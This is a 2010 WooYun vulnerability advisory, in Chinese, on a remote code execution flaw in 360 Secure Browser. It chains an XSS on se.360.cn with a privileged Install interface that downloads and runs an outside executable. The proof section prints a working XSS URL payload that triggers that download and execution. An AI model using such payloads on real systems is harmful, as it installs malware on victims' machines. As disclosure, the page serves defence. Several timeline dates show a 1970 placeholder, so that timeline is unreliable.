漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2010-020
漏洞标题:360安全浏览器远程代码执行漏洞
相关厂商:奇虎360
漏洞作者: 结界师
提交时间:2010-07-15 12:24
修复时间:2010-08-18 16:37
公开时间:2010-08-18 16:37
漏洞类型:远程代码执行
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2010-07-15: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-04: 细节向第三方安全合作伙伴开放
1970-02-25: 细节向核心白帽子及相关领域专家公开
1970-03-07: 细节向普通白帽子公开
1970-03-17: 细节向实习白帽子公开
2010-08-18: 细节向公众公开
简要描述:
360安全浏览器(360SE)是互联网上好用、安全的新一代浏览器,和360安全卫士、360杀毒等软件等产品一同成为360安全中心的系列产品,官方网站在http://se.360.cn。
在360浏览器中存在一个设计上的问题,结合一些其他的漏洞可能导致远程代码执行。
详细说明:
360浏览器为了扩展自己的功能,在内部实现了一系列的扩展接口,并且通过web可以调用这些接口,但是在跨越安全边界时唯一的检查就是调用的来源,必须为se.360.cn才可以调用这些接口。
通过在se.360.cn网站中漏洞的查找,通过一个xss可以跨越这个边界,从而直接调用这些接口。某些接口如插件支持上可以下载远程的可执行程序直接执行,同时执行的时候并没有对来源应用程序做签名等认证,导致可以直接下载恶意程序执行。
漏洞证明:
http://se.360.cn/v3/guide/guide_start.htm?ver=3.1.0.8&firstcheck=1&1="><iframe name="fuck" src="http://se.360.cn/v3/plugins.htm" onload=alert(fuck.window.eval("Install('ExtWebMail','1.1.0.1013','360邮件通','http://www.wooyun.org/ExtWebmail.zip','3.1.0.8')"))></iframe>
其中ExtWebmail.zip里自定义的ExtWebmail.exe将会被执行
修复方案:
1 修复xss(无法解决se.360.cn的其他安全问题)
2 验证程序的来源(无法解决其他接口的问题)
版权声明:转载请注明来源 结界师@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:17
确认时间:2010-07-15 12:24
厂商回复:
该漏洞已经修复,感谢wooyun对360浏览器的支持。
由于该漏洞需在特定场景下才能被利用,因此危害等级为:中
最新状态:
暂无